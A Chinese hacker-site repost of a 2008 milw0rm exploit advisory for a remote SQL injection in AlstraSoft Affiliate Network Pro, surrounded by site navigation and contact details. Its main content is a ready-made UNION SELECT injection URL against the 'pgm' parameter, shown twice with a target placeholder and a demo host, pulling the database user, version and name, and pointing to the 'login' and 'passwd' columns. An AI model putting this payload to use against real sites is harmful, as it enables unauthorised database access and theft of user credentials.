| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 | 
服务导航 我要发布 主力频道 空间域名 精华收集 服务器出租 黑客培训 光盘刻录 特色服务 解决方案 我要投诉
您现在的位置: 华夏黑客同盟 >> 漏洞 >> web apps >> 正文 用户登录 新用户注册
AlstraSoft 远程SQL注入           ★★★ 【字体:
AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability
作者:milw0rm 文章来源:milw0rm 点击数: 更新时间:2008-7-18
|___________________________________________________|
|
|AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|    Home :  www.tryag.cc/cc
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
|                                                   |
|
|
| script : http://www.alstrasoft.com/affiliate.htm
|
| DorK   : N/A
|
|___________________________________________________|

Exploit: 


www.[target].com/Script/index.php?Act=directory&joinstatus=pgmwise&pgm=-1+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,version(),30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,database(),48,49,50,51,52,53,54,55,56,57,58,59,60,61--


Exploit demo :

http://www.xxx.com/affiliate/index.php?Act=directory&joinstatus=pgmwise&pgm=-1+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,version(),30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,database(),48,49,50,51,52,53,54,55,56,57,58,59,60,61--


_____________
column_name

login
passwd
_____________



____________________________( Greetz )____________________________
|
| tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke
|  
| Iraqihack / FAHD / mos_chori / Silic0n / WaWi AlBaSrah
|
|_________________________________________________________________


                       Im IRAQi

# milw0rm.com
责任编辑:朱倩  联系方式  Email:朱倩
电话:51228163
  • 上一篇漏洞:

  • 下一篇漏洞:
  • 最新hack更新
    最新推荐资讯
    相关漏洞
    addalink远程SQL注入漏洞
    远程SQL注入漏洞
    SQL注入漏洞的利用
    phprealty 远程文件包含漏洞
    远程文件包含漏洞
    远程拒绝服务漏洞
    远程SQL注入漏洞
    Attachmax 多个远程漏洞
    Gonafish SQL注入漏洞
    盲SQL注入漏洞
    最新会员软件
    最新推荐视频
    最新推荐动画

    Copyright @ 2005 77169.Net Inc. All rights reserved. 华夏黑客同盟 版权所有
    北京市电信通提供网络带宽

    mailto:webmaster@77169.net
    咨询QQ号:836982 / 59280880
    联系站长 QQ38588913
    热线电话: 86-10-67634029/676229433
    京ICP证041431号